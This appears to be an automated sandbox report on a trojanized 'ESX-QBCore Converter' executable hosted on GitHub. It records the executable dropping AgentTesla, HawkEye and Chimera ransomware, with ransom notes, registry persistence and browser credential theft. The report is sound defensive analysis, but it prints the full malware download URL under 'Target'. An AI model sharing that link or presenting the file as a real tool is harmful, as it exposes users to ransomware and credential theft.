chimera | hxxps://github[.]com/sledgehamm3r/ESX-QBCore-Converter/releases/download/Release/sledge[.]dev-esx-qb-converter[.]exe

Analysis

max time kernel
591s
max time network
593s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
22-09-2024 01:04

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

https://github.com/sledgehamm3r/ESX-QBCore-Converter/releases/download/Release/sledge.dev-esx-qb-converter.exe

Score

10^/10

chimera discovery macro macro_on_action persistence ransomware spyware stealer

Malware Config

Signatures

Chimera 64 IoCs

Ransomware which infects local and network files, often distributed via Dropbox links.

ransomware chimera

Processes:

ButterflyOnDesktop.exe

description	ioc	process
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\it-it\YOUR_FILES_ARE_ENCRYPTED.HTML	ButterflyOnDesktop.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\ro-ro\YOUR_FILES_ARE_ENCRYPTED.HTML	ButterflyOnDesktop.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\YOUR_FILES_ARE_ENCRYPTED.HTML	ButterflyOnDesktop.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\root\YOUR_FILES_ARE_ENCRYPTED.HTML	ButterflyOnDesktop.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\pl-pl\YOUR_FILES_ARE_ENCRYPTED.HTML	ButterflyOnDesktop.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\en-ae\YOUR_FILES_ARE_ENCRYPTED.HTML	ButterflyOnDesktop.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files-select\js\YOUR_FILES_ARE_ENCRYPTED.HTML	ButterflyOnDesktop.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\es-es\YOUR_FILES_ARE_ENCRYPTED.HTML	ButterflyOnDesktop.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ja-jp\YOUR_FILES_ARE_ENCRYPTED.HTML	ButterflyOnDesktop.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\de-de\YOUR_FILES_ARE_ENCRYPTED.HTML	ButterflyOnDesktop.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ru-ru\YOUR_FILES_ARE_ENCRYPTED.HTML	ButterflyOnDesktop.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\pt-br\YOUR_FILES_ARE_ENCRYPTED.HTML	ButterflyOnDesktop.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\tr-tr\YOUR_FILES_ARE_ENCRYPTED.HTML	ButterflyOnDesktop.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\hi_contrast\YOUR_FILES_ARE_ENCRYPTED.HTML	ButterflyOnDesktop.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\nl-nl\YOUR_FILES_ARE_ENCRYPTED.HTML	ButterflyOnDesktop.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\it-it\YOUR_FILES_ARE_ENCRYPTED.HTML	ButterflyOnDesktop.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\en-gb\YOUR_FILES_ARE_ENCRYPTED.HTML	ButterflyOnDesktop.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\it-it\YOUR_FILES_ARE_ENCRYPTED.HTML	ButterflyOnDesktop.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\root\YOUR_FILES_ARE_ENCRYPTED.HTML	ButterflyOnDesktop.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\zh-cn\YOUR_FILES_ARE_ENCRYPTED.HTML	ButterflyOnDesktop.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\es-es\YOUR_FILES_ARE_ENCRYPTED.HTML	ButterflyOnDesktop.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\root\YOUR_FILES_ARE_ENCRYPTED.HTML	ButterflyOnDesktop.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\de-de\YOUR_FILES_ARE_ENCRYPTED.HTML	ButterflyOnDesktop.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\ca-es\YOUR_FILES_ARE_ENCRYPTED.HTML	ButterflyOnDesktop.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\YOUR_FILES_ARE_ENCRYPTED.HTML	ButterflyOnDesktop.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\hr-hr\YOUR_FILES_ARE_ENCRYPTED.HTML	ButterflyOnDesktop.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\es-es\YOUR_FILES_ARE_ENCRYPTED.HTML	ButterflyOnDesktop.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\root\YOUR_FILES_ARE_ENCRYPTED.HTML	ButterflyOnDesktop.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\sk-sk\YOUR_FILES_ARE_ENCRYPTED.HTML	ButterflyOnDesktop.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\ja-jp\YOUR_FILES_ARE_ENCRYPTED.HTML	ButterflyOnDesktop.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\fi-fi\YOUR_FILES_ARE_ENCRYPTED.HTML	ButterflyOnDesktop.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\tr-tr\YOUR_FILES_ARE_ENCRYPTED.HTML	ButterflyOnDesktop.exe
File created	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\YOUR_FILES_ARE_ENCRYPTED.HTML	ButterflyOnDesktop.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\uk-ua\YOUR_FILES_ARE_ENCRYPTED.HTML	ButterflyOnDesktop.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\it-it\YOUR_FILES_ARE_ENCRYPTED.HTML	ButterflyOnDesktop.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\pt-br\YOUR_FILES_ARE_ENCRYPTED.HTML	ButterflyOnDesktop.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\root\YOUR_FILES_ARE_ENCRYPTED.HTML	ButterflyOnDesktop.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\fr-ma\YOUR_FILES_ARE_ENCRYPTED.HTML	ButterflyOnDesktop.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\sk-sk\YOUR_FILES_ARE_ENCRYPTED.HTML	ButterflyOnDesktop.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\hr-hr\YOUR_FILES_ARE_ENCRYPTED.HTML	ButterflyOnDesktop.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\pt-br\YOUR_FILES_ARE_ENCRYPTED.HTML	ButterflyOnDesktop.exe
File created	C:\Program Files (x86)\Butterfly on Desktop\YOUR_FILES_ARE_ENCRYPTED.HTML	ButterflyOnDesktop.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\eu-es\YOUR_FILES_ARE_ENCRYPTED.HTML	ButterflyOnDesktop.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\YOUR_FILES_ARE_ENCRYPTED.HTML	ButterflyOnDesktop.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\YOUR_FILES_ARE_ENCRYPTED.HTML	ButterflyOnDesktop.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\hr-hr\YOUR_FILES_ARE_ENCRYPTED.HTML	ButterflyOnDesktop.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\cs-cz\YOUR_FILES_ARE_ENCRYPTED.HTML	ButterflyOnDesktop.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\YOUR_FILES_ARE_ENCRYPTED.HTML	ButterflyOnDesktop.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\pl-pl\YOUR_FILES_ARE_ENCRYPTED.HTML	ButterflyOnDesktop.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\ja-jp\YOUR_FILES_ARE_ENCRYPTED.HTML	ButterflyOnDesktop.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\es-es\YOUR_FILES_ARE_ENCRYPTED.HTML	ButterflyOnDesktop.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\fr-fr\YOUR_FILES_ARE_ENCRYPTED.HTML	ButterflyOnDesktop.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\da-dk\YOUR_FILES_ARE_ENCRYPTED.HTML	ButterflyOnDesktop.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\zh-tw\YOUR_FILES_ARE_ENCRYPTED.HTML	ButterflyOnDesktop.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\hu-hu\YOUR_FILES_ARE_ENCRYPTED.HTML	ButterflyOnDesktop.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\da-dk\YOUR_FILES_ARE_ENCRYPTED.HTML	ButterflyOnDesktop.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\fr-ma\YOUR_FILES_ARE_ENCRYPTED.HTML	ButterflyOnDesktop.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\themes\dark\YOUR_FILES_ARE_ENCRYPTED.HTML	ButterflyOnDesktop.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\sv-se\YOUR_FILES_ARE_ENCRYPTED.HTML	ButterflyOnDesktop.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\YOUR_FILES_ARE_ENCRYPTED.HTML	ButterflyOnDesktop.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\it-it\YOUR_FILES_ARE_ENCRYPTED.HTML	ButterflyOnDesktop.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\nb-no\YOUR_FILES_ARE_ENCRYPTED.HTML	ButterflyOnDesktop.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\nb-no\YOUR_FILES_ARE_ENCRYPTED.HTML	ButterflyOnDesktop.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\YOUR_FILES_ARE_ENCRYPTED.HTML	ButterflyOnDesktop.exe

Chimera Ransomware Loader DLL 1 IoCs

Drops/unpacks executable file which resembles Chimera's Loader.dll.

ransomware

Processes:

resource	yara_rule
behavioral1/memory/3092-2392-0x0000000010000000-0x0000000010010000-memory.dmp	chimera_loader_dll

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process	5488	5912	cmd.exe	WINWORD.EXE

Renames multiple (3370) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware
Downloads MZ/PE file

Office macro that triggers on suspicious action 1 IoCs

Office document macro which triggers in special circumstances - often malicious.

macro macro_on_action

Processes:

resource	yara_rule
C:\Users\Admin\Downloads\Kakwa.doc	office_macro_on_action

Executes dropped EXE 7 IoCs

Processes:

sledge.dev-esx-qb-converter.exesledge.dev-esx-qb-converter.exeAgentTesla.exebutterflyondesktop.exebutterflyondesktop.tmpButterflyOnDesktop.exeHawkEye.exe

pid	process
3188	sledge.dev-esx-qb-converter.exe
932	sledge.dev-esx-qb-converter.exe
392	AgentTesla.exe
1072	butterflyondesktop.exe
2756	butterflyondesktop.tmp
5876	ButterflyOnDesktop.exe
3092	HawkEye.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

butterflyondesktop.tmpButterflyOnDesktop.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ButterflyOnDesktop	butterflyondesktop.tmp
Set value (str)	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ButterflyOnDesktop = "C:\\Program Files (x86)\\Butterfly on Desktop\\ButterflyOnDesktop.exe"	ButterflyOnDesktop.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops desktop.ini file(s) 27 IoCs

Processes:

ButterflyOnDesktop.exe

description	ioc	process
File opened for modification	C:\Users\Admin\Searches\desktop.ini	ButterflyOnDesktop.exe
File opened for modification	C:\Users\Public\Libraries\desktop.ini	ButterflyOnDesktop.exe
File opened for modification	C:\Users\Public\desktop.ini	ButterflyOnDesktop.exe
File opened for modification	C:\Program Files\desktop.ini	ButterflyOnDesktop.exe
File opened for modification	C:\Users\Admin\3D Objects\desktop.ini	ButterflyOnDesktop.exe
File opened for modification	C:\Users\Admin\Music\desktop.ini	ButterflyOnDesktop.exe
File opened for modification	C:\Users\Admin\OneDrive\desktop.ini	ButterflyOnDesktop.exe
File opened for modification	C:\Users\Admin\Pictures\Saved Pictures\desktop.ini	ButterflyOnDesktop.exe
File opened for modification	C:\Users\Public\AccountPictures\desktop.ini	ButterflyOnDesktop.exe
File opened for modification	C:\Users\Public\Desktop\desktop.ini	ButterflyOnDesktop.exe
File opened for modification	C:\Users\Admin\Documents\desktop.ini	ButterflyOnDesktop.exe
File opened for modification	C:\Users\Admin\Links\desktop.ini	ButterflyOnDesktop.exe
File opened for modification	C:\Users\Public\Videos\desktop.ini	ButterflyOnDesktop.exe
File opened for modification	C:\Program Files (x86)\desktop.ini	ButterflyOnDesktop.exe
File opened for modification	C:\Users\Admin\Pictures\Camera Roll\desktop.ini	ButterflyOnDesktop.exe
File opened for modification	C:\Users\Admin\Contacts\desktop.ini	ButterflyOnDesktop.exe
File opened for modification	C:\Users\Admin\Pictures\desktop.ini	ButterflyOnDesktop.exe
File opened for modification	C:\Users\Public\Music\desktop.ini	ButterflyOnDesktop.exe
File opened for modification	C:\Users\Admin\Downloads\desktop.ini	ButterflyOnDesktop.exe
File opened for modification	C:\Users\Admin\Saved Games\desktop.ini	ButterflyOnDesktop.exe
File opened for modification	C:\Users\Public\Downloads\desktop.ini	ButterflyOnDesktop.exe
File opened for modification	C:\Users\Admin\Desktop\desktop.ini	ButterflyOnDesktop.exe
File opened for modification	C:\Users\Admin\Favorites\Links\desktop.ini	ButterflyOnDesktop.exe
File opened for modification	C:\Users\Admin\Favorites\desktop.ini	ButterflyOnDesktop.exe
File opened for modification	C:\Users\Admin\Videos\desktop.ini	ButterflyOnDesktop.exe
File opened for modification	C:\Users\Public\Documents\desktop.ini	ButterflyOnDesktop.exe
File opened for modification	C:\Users\Public\Pictures\desktop.ini	ButterflyOnDesktop.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service
T1102

Processes:

flow ioc

249 raw.githubusercontent.com
250 raw.githubusercontent.com
251 raw.githubusercontent.com
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

289 bot.whatismyipaddress.com

flow	ioc
249	raw.githubusercontent.com
250	raw.githubusercontent.com
251	raw.githubusercontent.com

flow	ioc
289	bot.whatismyipaddress.com

Drops file in Program Files directory 64 IoCs

Processes:

ButterflyOnDesktop.exe

description	ioc	process
File opened for modification	C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\contrast-white\SplashScreen.scale-400_contrast-white.png	ButterflyOnDesktop.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_x64__8wekyb3d8bbwe\Assets\AlarmsSmallTile.contrast-white_scale-200.png	ButterflyOnDesktop.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxMailAppList.targetsize-32_altform-unplated.png	ButterflyOnDesktop.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Car\RTL\contrast-white\LargeTile.scale-200.png	ButterflyOnDesktop.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.XboxApp_48.49.31001.0_x64__8wekyb3d8bbwe\XboxApp.UI\Resources\Images\star_qtr.png	ButterflyOnDesktop.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-black\AppIcon.targetsize-20_altform-unplated_contrast-black.png	ButterflyOnDesktop.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\es-es\YOUR_FILES_ARE_ENCRYPTED.HTML	ButterflyOnDesktop.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\lib\images\cursors\win32_CopyNoDrop32x32.gif	ButterflyOnDesktop.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\YOUR_FILES_ARE_ENCRYPTED.HTML	ButterflyOnDesktop.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-si\ui-strings.js	ButterflyOnDesktop.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\Images\Ratings\Yelp10.scale-200.png	ButterflyOnDesktop.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.XboxApp_48.49.31001.0_x64__8wekyb3d8bbwe\Assets\GamesXboxHubMedTile.scale-100.png	ButterflyOnDesktop.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.XboxGameOverlay_1.46.11001.0_x64__8wekyb3d8bbwe\Assets\XboxNotificationLogo.png	ButterflyOnDesktop.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\offlineStrings.js	ButterflyOnDesktop.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\sv-se\ui-strings.js	ButterflyOnDesktop.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\en-us\outlook_whatsnew.xml	ButterflyOnDesktop.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WebpImageExtension_1.0.22753.0_x64__8wekyb3d8bbwe\Assets\AppList.targetsize-256.png	ButterflyOnDesktop.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\AppPackageStoreLogo.scale-125.png	ButterflyOnDesktop.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\Date.targetsize-24_contrast-white.png	ButterflyOnDesktop.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.targetsize-60_altform-lightunplated.png	ButterflyOnDesktop.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\contrast-white\WideLogo.scale-100_contrast-white.png	ButterflyOnDesktop.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\FileExtension.targetsize-336.png	ButterflyOnDesktop.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\SearchEmail2x.png	ButterflyOnDesktop.exe
File opened for modification	C:\Program Files\Windows Media Player\Network Sharing\ConnectionManager.xml	ButterflyOnDesktop.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppPackageWideTile.scale-200_contrast-white.png	ButterflyOnDesktop.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\images\themes\dark\s_checkbox_selected_18.svg	ButterflyOnDesktop.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\pt-br\YOUR_FILES_ARE_ENCRYPTED.HTML	ButterflyOnDesktop.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\OneNoteSectionGroupMedTile.scale-100.png	ButterflyOnDesktop.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\Assets\AppList.targetsize-256.png	ButterflyOnDesktop.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\Assets\PhotosAppList.targetsize-64_altform-fullcolor.png	ButterflyOnDesktop.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxCalendarAppList.scale-150.png	ButterflyOnDesktop.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_2019.1111.2029.0_neutral_~_8wekyb3d8bbwe\AppxMetadata\AppxBundleManifest.xml	ButterflyOnDesktop.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ko-kr\YOUR_FILES_ARE_ENCRYPTED.HTML	ButterflyOnDesktop.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-black\MapsAppList.targetsize-80_altform-unplated.png	ButterflyOnDesktop.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected]	ButterflyOnDesktop.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteMediumTile.scale-400.png	ButterflyOnDesktop.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\Assets\WideTile.scale-400.png	ButterflyOnDesktop.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_x64__8wekyb3d8bbwe\Assets\AlarmsAppList.contrast-black_targetsize-30_altform-unplated.png	ButterflyOnDesktop.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppTiles\contrast-black\MapsMedTile.scale-100.png	ButterflyOnDesktop.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\images\themes\dark\core_icons.png	ButterflyOnDesktop.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\nl-nl\YOUR_FILES_ARE_ENCRYPTED.HTML	ButterflyOnDesktop.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\plugins\rhp\pages-app-selector.js	ButterflyOnDesktop.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.Windows.Photos_2019.19071.12548.0_neutral_split.scale-100_8wekyb3d8bbwe\AppxManifest.xml	ButterflyOnDesktop.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\sv-se\ui-strings.js	ButterflyOnDesktop.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Work\RTL\contrast-black\MedTile.scale-100.png	ButterflyOnDesktop.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\AppList.targetsize-256_altform-unplated_devicefamily-colorfulunplated.png	ButterflyOnDesktop.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\checkmark.png	ButterflyOnDesktop.exe
File opened for modification	C:\Program Files\7-Zip\Lang\va.txt	ButterflyOnDesktop.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\oskclearui.xml	ButterflyOnDesktop.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteSectionGroupLargeTile.scale-400.png	ButterflyOnDesktop.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.20875.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\WideTile.scale-100.png	ButterflyOnDesktop.exe
